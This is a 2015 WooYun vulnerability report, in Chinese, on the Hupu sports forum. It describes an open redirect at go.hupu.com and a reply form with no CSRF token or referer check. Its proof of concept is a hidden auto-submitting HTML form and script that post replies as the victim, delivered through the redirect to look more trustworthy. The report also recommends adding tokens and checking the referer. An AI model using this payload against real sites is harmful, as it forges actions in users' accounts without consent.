漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110198
漏洞标题:虎扑URL跳转+CSRF可以任意水帖
相关厂商:虎扑体育网
漏洞作者: 路人甲
提交时间:2015-04-27 12:22
修复时间:2015-04-27 12:45
公开时间:2015-04-27 12:45
漏洞类型:设计缺陷/逻辑错误
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT,成功让室友水贴
详细说明:
URL跳转:go.hupu.com/u?url=
CSRF:bbs回帖处 无token,无referer判断
所以http://go.hupu.com/u?url=http://x.x.x.x/csrf.html 可能更有欺骗性
漏洞证明:
<div id="bodyframe" style="VISIBILITY: hidden">
<form id="fastform" name="FORM" class="j_atc_content left" method="post" action="http://bbs.hupu.com/post.php?" onsubmit="textConvert('fastform', 'atc_content')">
<!--回复框-->
<div id="re" class="box"><div id="re_top"></div>
<div id="re_box">
<div class="left"><a class="headpic" href="http://my.hupu.com/19312932"><img width="45" height="45" src="http://i1.hoopchina.com.cn/user/default_small.jpg"></a><br> <a class="blue" style="" href="http://my.hupu.com/set.php?s=picture">更新头像</a></div>
<div class="input"><a id="j_face" class="face_button" title="点击选择你要添加的表情"> </a>
<div class="plate_03" style="position:absolute;top:0;right:5px;font-size:14px;">
<!-- 文字链广告-->
<script type="text/javascript">
GA_googleFillSlotWithSize("ca-pub-1024337685431355", "word_bbs_content", 300, 20);
</script><script async="" type="text/javascript" src="http://www.googletagservices.com/tag/js/check_359604.js"></script><iframe src="http://tpc.googlesyndication.com/safeframe/1-0-2/html/container.html" style="visibility: hidden; display: none;"></iframe><div id="google_ads_div_word_bbs_content"><ins style="position:relative;width:300px;height:20px;border:none;display:inline-table;"><ins style="position:relative;width:300px;height:20px;border:none;display:block;"><iframe id="google_ads_iframe_word_bbs_content" name="google_ads_iframe_word_bbs_content" width="300" height="20" vspace="0" hspace="0" allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" style="border:0px;left:0;position:absolute;top:0;" src="http://pubads.g.doubleclick.net/gampad/ads?correlator=3366246463569920&output=html&impl=ifr&client=ca-pub-1024337685431355&slotname=word_bbs_content&page_slots=word_bbs_content&cookie=ID%3D109e1fe8b0dad7a0%3AT%3D1429776732%3AS%3DALNI_MbzO8BbJ61Pyd4OVMHyoyHY-ukiyw&url=http%3A%2F%2Fbbs.hupu.com%2F12523690-last.html%23o&ref=http%3A%2F%2Fbbs.hupu.com%2Fpost.php%3F&lmt=1429777822&dt=1429777822133&cc=100&biw=1349&bih=667&adk=3149788808&adx=451&ady=2599&ifi=1&oid=3&ea=0&u_tz=480&u_his=12&u_java=true&u_h=768&u_w=1366&u_ah=728&u_aw=1366&u_cd=24&u_nplug=27&u_nmime=98&flash=16.0.0&gads=v2&ga_vid=1233016655.1429777822&ga_sid=1429777822&ga_hid=832738673"></iframe></ins></ins></div></div>
<div id="face_lable" class="face_img" style="display:none;overflow-y:scroll;"><div id="leftface" class="left"></div></div>
<textarea name="atc_content" id="atc_content" rows="8" style="height: 96px;" value="6666666666666"></textarea>
<div class="fb_pic" id="add_li_vote" style=" margin:-3px 8px 10px 0; display:none;">
<input name="usevote" id="usevote" type="hidden" value="0">
<input name="douid" id="usevote" type="hidden" value="1">
<input name="votetype" type="hidden" value="bbs">
<a href="javascript:;" id="del_vote" class="del" style="float:right"> </a><strong>添加投票</strong><br>
<span class="f666">投票主题:</span><input id="votetitle" name="votetitle" class="inputfile" style="border-top:1px solid #444;border-left:1px solid #444;width:400px;" type="text">
<div id="uppic1"><span class="f666">选项1:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic2"><span class="f666">选项2:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic3"><span class="f666">选项3:</span><input name="votename[]" type="text" class="inputfile"><a class="blue" onclick="delvotenoe('3')" href="javascript:;"> X </a></div>
<input name="editnum" type="hidden" id="editnum" value="3">
<input name="nowitnum" type="hidden" id="nowitnum" value="3">
<div id="addvote"></div>
<div class="f444" style="width:425px;"><span class="f666"> </span><div id="addvotenum"><a class="blue right" onclick="doadd(1)" href="javascript:;">+增加一项</a></div><label for="multiplevote"><input id="multiplevote" type="checkbox"> 允许多选</label><span style="display:none;">,最多可选<input name="voteclass" class="inputtext width60px" size="1" maxlength="2" value="">个</span></div>
</div>
<div class="right" style=""><label for="fbd_reply_note"><input name="fbd_reply_note" type="checkbox" value="1" id="fbd_reply_note">同步发布到<a class="blue" href="http://my.hupu.com/19312932/note">我的碎碎念</a></label></div>
<input name="postfast" type="hidden" value="2">
<input id="fastbtn" class="btns2" type="submit" value="回 复" title="按 Ctrl + Enter 可提交回复">
<span style="margin-left:20px;"><a id="p4" class="blue" href="javascript:;">添加投票</a></span>
<span id="adv_reply" style="margin-left:20px;"><a id="orz" class="blue" href="/post.php?action=reply&fid=1048&tid=12523690&replayofpage=">高级回复 ?</a></span>
</div>
<div class="clearfix"></div></div>
<div id="re_bottom"></div></div><!--回复框END-->
<input type="hidden" name="atc_title" value="Re:【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" size="65">
<input type="hidden" name="atc_usesign" value="1">
<input type="hidden" name="atc_convert" value="1">
<input type="hidden" name="atc_autourl" value="1">
<input type="hidden" value="2" name="step">
<input type="hidden" value="reply" name="action">
<input type="hidden" value="1048" name="fid">
<input type="hidden" value="12523690" name="tid">
<input type="hidden" value="【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" name="subject">
<input type="hidden" value="0" name="editor">
<input type="hidden" value="none" name="atc_attachment">
<input type="hidden" value="" name="replayofpage">
<input type="hidden" value="1" name="replaymeta">
</form>
</div>
<script>
document.getElementById("atc_content").value="老男人果然硬。。。。";
document.forms[0].submit();
</script>
修复方案:
加token
判断referer
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-27 12:45
厂商回复:
不错,很细心。
最新状态:
暂无